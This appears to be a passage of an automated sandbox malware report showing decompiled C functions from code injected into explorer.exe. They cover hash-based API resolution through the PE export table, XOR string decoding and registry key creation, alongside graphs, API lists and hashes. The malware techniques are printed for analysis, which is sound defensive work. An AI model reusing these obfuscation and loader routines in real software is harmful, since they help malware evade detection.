                                                                                                                                                                                              control_flow_graph 30 2f8eebb-2f8eed2 31 2f8ef2f 30->31 32 2f8eed4-2f8eefc 30->32 34 2f8ef31-2f8ef35 31->34 32->31 33 2f8eefe-2f8ef21 call 2f8a43d call 2f8e2c5 32->33 39 2f8ef23-2f8ef2d 33->39 40 2f8ef36-2f8ef4d 33->40 39->31 39->33 41 2f8ef4f-2f8ef57 40->41 42 2f8efa3-2f8efa5 40->42 41->42 43 2f8ef59 41->43 42->34 44 2f8ef5b-2f8ef61 43->44 45 2f8ef71-2f8ef82 44->45 46 2f8ef63-2f8ef65 44->46 48 2f8ef84-2f8ef85 45->48 49 2f8ef87-2f8ef93 LoadLibraryA 45->49 46->45 47 2f8ef67-2f8ef6f 46->47 47->44 47->45 48->49 49->31 50 2f8ef95-2f8ef9f GetProcAddress 49->50 50->31 51 2f8efa1 50->51 51->34
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8EEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E02F8E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E02F8A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                              0x02f8eec4
                                                                                                                                                                                              0x02f8eec6
                                                                                                                                                                                              0x02f8eec9
                                                                                                                                                                                              0x02f8eecc
                                                                                                                                                                                              0x02f8eed2
                                                                                                                                                                                              0x02f8ef2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef2f
                                                                                                                                                                                              0x02f8eed4
                                                                                                                                                                                              0x02f8eedf
                                                                                                                                                                                              0x02f8eee2
                                                                                                                                                                                              0x02f8eee7
                                                                                                                                                                                              0x02f8eeec
                                                                                                                                                                                              0x02f8eeef
                                                                                                                                                                                              0x02f8eef1
                                                                                                                                                                                              0x02f8eef4
                                                                                                                                                                                              0x02f8eef7
                                                                                                                                                                                              0x02f8eefc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eefe
                                                                                                                                                                                              0x02f8eefe
                                                                                                                                                                                              0x02f8ef10
                                                                                                                                                                                              0x02f8ef1d
                                                                                                                                                                                              0x02f8ef21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef23
                                                                                                                                                                                              0x02f8ef26
                                                                                                                                                                                              0x02f8ef27
                                                                                                                                                                                              0x02f8ef2d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef2d
                                                                                                                                                                                              0x02f8ef44
                                                                                                                                                                                              0x02f8ef49
                                                                                                                                                                                              0x02f8ef4d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef59
                                                                                                                                                                                              0x02f8ef59
                                                                                                                                                                                              0x02f8ef5b
                                                                                                                                                                                              0x02f8ef5b
                                                                                                                                                                                              0x02f8ef61
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef67
                                                                                                                                                                                              0x02f8ef6b
                                                                                                                                                                                              0x02f8ef6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef6f
                                                                                                                                                                                              0x02f8ef75
                                                                                                                                                                                              0x02f8ef7d
                                                                                                                                                                                              0x02f8ef82
                                                                                                                                                                                              0x02f8ef85
                                                                                                                                                                                              0x02f8ef85
                                                                                                                                                                                              0x02f8ef87
                                                                                                                                                                                              0x02f8ef8b
                                                                                                                                                                                              0x02f8ef93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef97
                                                                                                                                                                                              0x02f8ef9f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ef9f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 02F8EF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 02F8EF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 591ef5e86149833fa2018961c21f7f7d18c2cf8ae03c444301df9b178bafcd0d
                                                                                                                                                                                              • Instruction ID: f249b62efe9ce02dd701039933691f947fd12d0a05e63ce5a59a401555dc1b6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 591ef5e86149833fa2018961c21f7f7d18c2cf8ae03c444301df9b178bafcd0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D31C176F041559BCB24EF6DC880AAEFBF5AF44388F284469EA05E7351D730E951CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8A633 Relevance: 4.8, APIs: 3, Instructions: 251registryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                              			E02F8A633(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				int _v44;
				char _v108;
				int _t85;
				char _t89;
				void* _t90;
				char* _t91;
				intOrPtr* _t96;
				void* _t107;
				int* _t115;
				intOrPtr _t118;
				char* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				char _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				char* _t135;
				int _t139;
				int _t143;
				intOrPtr _t144;
				intOrPtr* _t150;
				int _t151;
				char _t157;
				int _t159;
				intOrPtr _t160;
				intOrPtr _t167;
				int _t172;
				char* _t173;
				char* _t174;
				char _t175;
				void* _t176;
				void* _t177;
				void* _t179;

				_t172 = 0;
				_v24 = __edx;
				_t173 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t85 = E02F88BDE(0x110);
				_t151 = _t85;
				_v44 = _t151;
				_t180 = _t151;
				if(_t151 == 0) {
					return _t85;
				}
				_t154 = _a4;
				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
				E02F8C43A(_a4, __edx, _t180, __fp0, _t154,  &_v108);
				_t157 = _v108;
				_t89 = _t157;
				if(_t157 - 0x61 <= 0x19) {
					_t89 = _t89 - 0x20;
				}
				_v108 = _t89;
				_t90 = E02F89DD8(0xf30);
				_t159 = _v24;
				_v16 = _t90;
				if(_t159 == 0) {
					L15:
					_t160 =  *0x2f9f81c; // 0x2fb0000
					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
						_push(_t172);
						_push( &_v108);
						_push("\\");
						_t91 = E02F89A07(_t90);
						_t177 = _t177 + 0x10;
						L19:
						_t173 = _t91;
						_v20 = _t173;
						goto L20;
					}
					_v24 = _t172;
					_v8 = 0x80000003;
					_t118 =  *0x2f9f820; // 0x508f8b8
					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
					__eflags = _v24 - _t173;
					if(_v24 == _t173) {
						goto L20;
					}
					_push(_t172);
					_push( &_v108);
					_t121 = "\\";
					_push(_t121);
					_push(_v16);
					_push(_t121);
					_t91 = E02F89A07(_v24);
					_t177 = _t177 + 0x18;
					goto L19;
				} else {
					_t122 =  *0x2f9f81c; // 0x2fb0000
					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
					_t124 =  *0x2f9f820; // 0x508f8b8
					_push(_t159);
					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
						_t90 = _v16;
						goto L15;
					}
					_v12 = _t172;
					_t127 =  *0x2f9f820; // 0x508f8b8
					_v8 = 0x80000003;
					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
					if(_v12 == _t173) {
						L20:
						E02F88B9C( &_v16);
						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
							_t96 = _a8;
							__eflags = _t96;
							if(_t96 != 0) {
								 *_t96 = 1;
							}
							RegCloseKey(_v28);
							L28:
							if(_t173 == 0) {
								L32:
								E02F88BF4( &_v44, 0x110);
								E02F88D6D( &_v108, _t172, 0x40);
								_t151 = _t172;
								L33:
								E02F88BF4( &_v20, 0xffffffff);
								return _t151;
							}
							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
							_t107 = E02F8A43D(_t173);
							 *_t151 = _t107;
							if(_t107 == 0) {
								goto L33;
							} else {
								goto L30;
							}
							do {
								L30:
								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
								_t172 = _t172 + 1;
							} while (_t172 <  *_t151);
							goto L33;
						}
						_v16 = _t172;
						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
							goto L32;
						}
						_t115 = _a8;
						if(_t115 != 0) {
							 *_t115 = _t172;
						}
						RegCloseKey(_v16);
						goto L28;
					}
					_push(_t172);
					_push(_v16);
					_t174 = "\\";
					_push(_t174);
					_t129 = E02F89A07(_v12);
					_t177 = _t177 + 0x10;
					_v40 = _t129;
					if(_t129 == 0) {
						goto L32;
					}
					_push( &_v36);
					_push(0x20019);
					_push(_t172);
					_push(_t129);
					_t130 =  *0x2f9f820; // 0x508f8b8
					_push(_v8);
					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
						_t132 =  *0x2f9f820; // 0x508f8b8
						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
					} else {
						_t139 = E02F89DF2( &_v36, 0x9c4);
						_push(_t172);
						_push(_t139);
						_push(0x2f9c9a0);
						_v24 = _t139;
						_t175 = E02F89A5A(_v32);
						_v32 = _t175;
						E02F88BAF( &_v24);
						_t179 = _t177 + 0x18;
						_t143 = E02F89930(_v12);
						_push(_t175);
						_push(_t143);
						_push(_v8);
						_v24 = _t143;
						_t144 =  *0x2f9f820; // 0x508f8b8
						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
							_t150 = _a12;
							if(_t150 != 0) {
								 *_t150 = 1;
							}
						}
						E02F88BF4( &_v32, 0xfffffffe);
						E02F88BF4( &_v24, 0xfffffffe);
						_t177 = _t179 + 0x10;
						_t174 = "\\";
					}
					_t135 = E02F89A07(_v12);
					_t167 =  *0x2f9f818; // 0x508f6c8
					_t177 = _t177 + 0x18;
					_t173 = _t135;
					_v20 = _t173;
					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
					E02F88BF4( &_v40, 0xffffffff);
					goto L20;
				}
			}














































                                                                                                                                                                                              0x02f8a63c
                                                                                                                                                                                              0x02f8a63e
                                                                                                                                                                                              0x02f8a641
                                                                                                                                                                                              0x02f8a643
                                                                                                                                                                                              0x02f8a64b
                                                                                                                                                                                              0x02f8a64e
                                                                                                                                                                                              0x02f8a655
                                                                                                                                                                                              0x02f8a658
                                                                                                                                                                                              0x02f8a65d
                                                                                                                                                                                              0x02f8a65f
                                                                                                                                                                                              0x02f8a663
                                                                                                                                                                                              0x02f8a665
                                                                                                                                                                                              0x02f8a906
                                                                                                                                                                                              0x02f8a906
                                                                                                                                                                                              0x02f8a66b
                                                                                                                                                                                              0x02f8a673
                                                                                                                                                                                              0x02f8a679
                                                                                                                                                                                              0x02f8a680
                                                                                                                                                                                              0x02f8a688
                                                                                                                                                                                              0x02f8a68b
                                                                                                                                                                                              0x02f8a68d
                                                                                                                                                                                              0x02f8a68d
                                                                                                                                                                                              0x02f8a695
                                                                                                                                                                                              0x02f8a698
                                                                                                                                                                                              0x02f8a69d
                                                                                                                                                                                              0x02f8a6a0
                                                                                                                                                                                              0x02f8a6a5
                                                                                                                                                                                              0x02f8a7de
                                                                                                                                                                                              0x02f8a7de
                                                                                                                                                                                              0x02f8a7e4
                                                                                                                                                                                              0x02f8a7eb
                                                                                                                                                                                              0x02f8a82c
                                                                                                                                                                                              0x02f8a830
                                                                                                                                                                                              0x02f8a831
                                                                                                                                                                                              0x02f8a837
                                                                                                                                                                                              0x02f8a83c
                                                                                                                                                                                              0x02f8a83f
                                                                                                                                                                                              0x02f8a83f
                                                                                                                                                                                              0x02f8a841
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a841
                                                                                                                                                                                              0x02f8a7f0
                                                                                                                                                                                              0x02f8a7fa
                                                                                                                                                                                              0x02f8a803
                                                                                                                                                                                              0x02f8a808
                                                                                                                                                                                              0x02f8a80b
                                                                                                                                                                                              0x02f8a80e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a810
                                                                                                                                                                                              0x02f8a814
                                                                                                                                                                                              0x02f8a815
                                                                                                                                                                                              0x02f8a81a
                                                                                                                                                                                              0x02f8a81b
                                                                                                                                                                                              0x02f8a81e
                                                                                                                                                                                              0x02f8a822
                                                                                                                                                                                              0x02f8a827
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a6ab
                                                                                                                                                                                              0x02f8a6ab
                                                                                                                                                                                              0x02f8a6b6
                                                                                                                                                                                              0x02f8a6b8
                                                                                                                                                                                              0x02f8a6bd
                                                                                                                                                                                              0x02f8a6c3
                                                                                                                                                                                              0x02f8a7db
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a7db
                                                                                                                                                                                              0x02f8a6cc
                                                                                                                                                                                              0x02f8a6d0
                                                                                                                                                                                              0x02f8a6d8
                                                                                                                                                                                              0x02f8a6df
                                                                                                                                                                                              0x02f8a6e5
                                                                                                                                                                                              0x02f8a844
                                                                                                                                                                                              0x02f8a847
                                                                                                                                                                                              0x02f8a864
                                                                                                                                                                                              0x02f8a88b
                                                                                                                                                                                              0x02f8a88e
                                                                                                                                                                                              0x02f8a890
                                                                                                                                                                                              0x02f8a892
                                                                                                                                                                                              0x02f8a892
                                                                                                                                                                                              0x02f8a8a0
                                                                                                                                                                                              0x02f8a89b
                                                                                                                                                                                              0x02f8a8a5
                                                                                                                                                                                              0x02f8a8d4
                                                                                                                                                                                              0x02f8a8dd
                                                                                                                                                                                              0x02f8a8e9
                                                                                                                                                                                              0x02f8a8f1
                                                                                                                                                                                              0x02f8a8f3
                                                                                                                                                                                              0x02f8a8f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a900
                                                                                                                                                                                              0x02f8a8ab
                                                                                                                                                                                              0x02f8a8b1
                                                                                                                                                                                              0x02f8a8b6
                                                                                                                                                                                              0x02f8a8bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a8bd
                                                                                                                                                                                              0x02f8a8bd
                                                                                                                                                                                              0x02f8a8c9
                                                                                                                                                                                              0x02f8a8cd
                                                                                                                                                                                              0x02f8a8ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a8d2
                                                                                                                                                                                              0x02f8a869
                                                                                                                                                                                              0x02f8a87b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a87d
                                                                                                                                                                                              0x02f8a882
                                                                                                                                                                                              0x02f8a884
                                                                                                                                                                                              0x02f8a884
                                                                                                                                                                                              0x02f8a8a0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a8a0
                                                                                                                                                                                              0x02f8a6eb
                                                                                                                                                                                              0x02f8a6ec
                                                                                                                                                                                              0x02f8a6ef
                                                                                                                                                                                              0x02f8a6f4
                                                                                                                                                                                              0x02f8a6f8
                                                                                                                                                                                              0x02f8a6fd
                                                                                                                                                                                              0x02f8a700
                                                                                                                                                                                              0x02f8a705
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a70e
                                                                                                                                                                                              0x02f8a70f
                                                                                                                                                                                              0x02f8a714
                                                                                                                                                                                              0x02f8a715
                                                                                                                                                                                              0x02f8a716
                                                                                                                                                                                              0x02f8a71b
                                                                                                                                                                                              0x02f8a723
                                                                                                                                                                                              0x02f8a79b
                                                                                                                                                                                              0x02f8a7a3
                                                                                                                                                                                              0x02f8a725
                                                                                                                                                                                              0x02f8a72a
                                                                                                                                                                                              0x02f8a72f
                                                                                                                                                                                              0x02f8a730
                                                                                                                                                                                              0x02f8a731
                                                                                                                                                                                              0x02f8a739
                                                                                                                                                                                              0x02f8a741
                                                                                                                                                                                              0x02f8a747
                                                                                                                                                                                              0x02f8a74a
                                                                                                                                                                                              0x02f8a752
                                                                                                                                                                                              0x02f8a755
                                                                                                                                                                                              0x02f8a75a
                                                                                                                                                                                              0x02f8a75b
                                                                                                                                                                                              0x02f8a75c
                                                                                                                                                                                              0x02f8a75f
                                                                                                                                                                                              0x02f8a762
                                                                                                                                                                                              0x02f8a76c
                                                                                                                                                                                              0x02f8a76e
                                                                                                                                                                                              0x02f8a773
                                                                                                                                                                                              0x02f8a775
                                                                                                                                                                                              0x02f8a775
                                                                                                                                                                                              0x02f8a773
                                                                                                                                                                                              0x02f8a781
                                                                                                                                                                                              0x02f8a78c
                                                                                                                                                                                              0x02f8a791
                                                                                                                                                                                              0x02f8a794
                                                                                                                                                                                              0x02f8a794
                                                                                                                                                                                              0x02f8a7b3
                                                                                                                                                                                              0x02f8a7b8
                                                                                                                                                                                              0x02f8a7be
                                                                                                                                                                                              0x02f8a7c1
                                                                                                                                                                                              0x02f8a7c3
                                                                                                                                                                                              0x02f8a7c9
                                                                                                                                                                                              0x02f8a7d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8a7d8

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                                • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,02F8A621,?,?,00000001), ref: 02F8A85F
                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 02F8A876
                                                                                                                                                                                              • RegCloseKey.KERNELBASE(02F8A621,?,?,00000001), ref: 02F8A8A0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3570936880-0
                                                                                                                                                                                              • Opcode ID: e11f185a922f43dafde0674a1c544ca2e354ee2dcc89f142562c408c7bfaeac5
                                                                                                                                                                                              • Instruction ID: 211e55b44d0d7e836c8835e0fbff61461c43764424275797bf4ef267568f3c34
                                                                                                                                                                                              • Opcode Fuzzy Hash: e11f185a922f43dafde0674a1c544ca2e354ee2dcc89f142562c408c7bfaeac5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F913AB1E00209AFDB11EFA5CC44EEEFBB9EF48390F54416AE615E7250D7719A01DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F889EF Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 93stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 131 2f889ef-2f88a10 132 2f88a38-2f88a48 131->132 133 2f88a12-2f88a2a 131->133 136 2f88a58-2f88a5c 132->136 137 2f88a4a-2f88a4f 132->137 134 2f88a2c-2f88a30 133->134 135 2f88a34-2f88a36 133->135 134->133 138 2f88a32 134->138 135->132 140 2f88a6a-2f88a76 lstrlenA 136->140 141 2f88a5e-2f88a68 136->141 137->137 139 2f88a51-2f88a56 137->139 138->132 139->136 139->141 142 2f88a78-2f88a7c call 2f88bde 140->142 143 2f88aba 140->143 141->140 141->141 146 2f88a81-2f88a89 142->146 145 2f88abf 143->145 147 2f88ac1-2f88ac5 145->147 148 2f88a8b-2f88a90 146->148 149 2f88a92-2f88a9a 146->149 148->147 150 2f88a9c-2f88ab3 149->150 150->150 151 2f88ab5-2f88ab8 150->151 151->145
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F889EF(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v28;
				char _v32;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t54;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t63;
				void* _t73;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				void* _t80;

				_t77 = _a12;
				_v8 = __ecx;
				_t57 = 0;
				_v12 = __edx;
				_t54 = 0;
				_v16 = 0x5a;
				if(_t77 < __edx) {
					while(1) {
						_t74 = 0x5a;
						_t76 = _a12;
						if( *((intOrPtr*)(_t77 % _t74 + _a4)) ==  *((intOrPtr*)(_t77 + _v8))) {
							break;
						}
						_t77 = _t77 + 1;
						if(_t77 < _v12) {
							continue;
						} else {
						}
						goto L5;
					}
					_t54 = _t77 - _t76;
				}
				L5:
				_t39 = _t57;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				if(_v28 == _t39) {
					L8:
					_t63 = _t39;
					if(_t63 != 0) {
						goto L9;
					}
				} else {
					do {
						_t39 = _t39 + 1;
					} while ( *((intOrPtr*)(_t80 + _t39 - 0x18)) != _t57);
					_t63 = 0xe;
					if(_t39 > _t63) {
						do {
							L9:
							_t19 = _t57 + 0x30; // 0x30
							 *((char*)(_t80 + _t57 - 0x1c)) = _t19;
							_t57 = _t57 + 1;
						} while (_t57 < _t63);
					} else {
						goto L8;
					}
				}
				lstrlenA( &_v32);
				if(_t54 == 0) {
					_t58 = 0x2f9f896;
					goto L17;
				} else {
					_t23 = _t54 + 1; // 0x1
					_t44 = E02F88BDE(_t23); // executed
					_t60 = _t44;
					_v12 = _t60;
					if(_t60 != 0) {
						_t79 = _a12;
						_t61 = _v8;
						_t73 = _t60 - _t79;
						do {
							 *(_t73 + _t79) =  *(_t79 % _v16 + _a4) ^  *(_t79 + _t61);
							_t79 = _t79 + 1;
							_t54 = _t54 - 1;
						} while (_t54 != 0);
						_t58 = _v12;
						L17:
						_t42 = _t58;
					} else {
						_t42 = 0x2f9f896;
					}
				}
				return _t42;
			}























                                                                                                                                                                                              0x02f889f7
                                                                                                                                                                                              0x02f889fc
                                                                                                                                                                                              0x02f889ff
                                                                                                                                                                                              0x02f88a01
                                                                                                                                                                                              0x02f88a04
                                                                                                                                                                                              0x02f88a06
                                                                                                                                                                                              0x02f88a10
                                                                                                                                                                                              0x02f88a12
                                                                                                                                                                                              0x02f88a18
                                                                                                                                                                                              0x02f88a24
                                                                                                                                                                                              0x02f88a2a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a2c
                                                                                                                                                                                              0x02f88a30
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a32
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a30
                                                                                                                                                                                              0x02f88a36
                                                                                                                                                                                              0x02f88a36
                                                                                                                                                                                              0x02f88a38
                                                                                                                                                                                              0x02f88a40
                                                                                                                                                                                              0x02f88a42
                                                                                                                                                                                              0x02f88a43
                                                                                                                                                                                              0x02f88a44
                                                                                                                                                                                              0x02f88a48
                                                                                                                                                                                              0x02f88a58
                                                                                                                                                                                              0x02f88a58
                                                                                                                                                                                              0x02f88a5c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a4a
                                                                                                                                                                                              0x02f88a4a
                                                                                                                                                                                              0x02f88a4a
                                                                                                                                                                                              0x02f88a4b
                                                                                                                                                                                              0x02f88a53
                                                                                                                                                                                              0x02f88a56
                                                                                                                                                                                              0x02f88a5e
                                                                                                                                                                                              0x02f88a5e
                                                                                                                                                                                              0x02f88a5e
                                                                                                                                                                                              0x02f88a61
                                                                                                                                                                                              0x02f88a65
                                                                                                                                                                                              0x02f88a66
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a56
                                                                                                                                                                                              0x02f88a6e
                                                                                                                                                                                              0x02f88a76
                                                                                                                                                                                              0x02f88aba
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f88a78
                                                                                                                                                                                              0x02f88a78
                                                                                                                                                                                              0x02f88a7c
                                                                                                                                                                                              0x02f88a82
                                                                                                                                                                                              0x02f88a84
                                                                                                                                                                                              0x02f88a89
                                                                                                                                                                                              0x02f88a92
                                                                                                                                                                                              0x02f88a97
                                                                                                                                                                                              0x02f88a9a
                                                                                                                                                                                              0x02f88a9c
                                                                                                                                                                                              0x02f88aac
                                                                                                                                                                                              0x02f88aaf
                                                                                                                                                                                              0x02f88ab0
                                                                                                                                                                                              0x02f88ab0
                                                                                                                                                                                              0x02f88ab5
                                                                                                                                                                                              0x02f88abf
                                                                                                                                                                                              0x02f88abf
                                                                                                                                                                                              0x02f88a8b
                                                                                                                                                                                              0x02f88a8b
                                                                                                                                                                                              0x02f88a8b
                                                                                                                                                                                              0x02f88a89
                                                                                                                                                                                              0x02f88ac5

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000138,?,02F9CA50), ref: 02F88A6E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
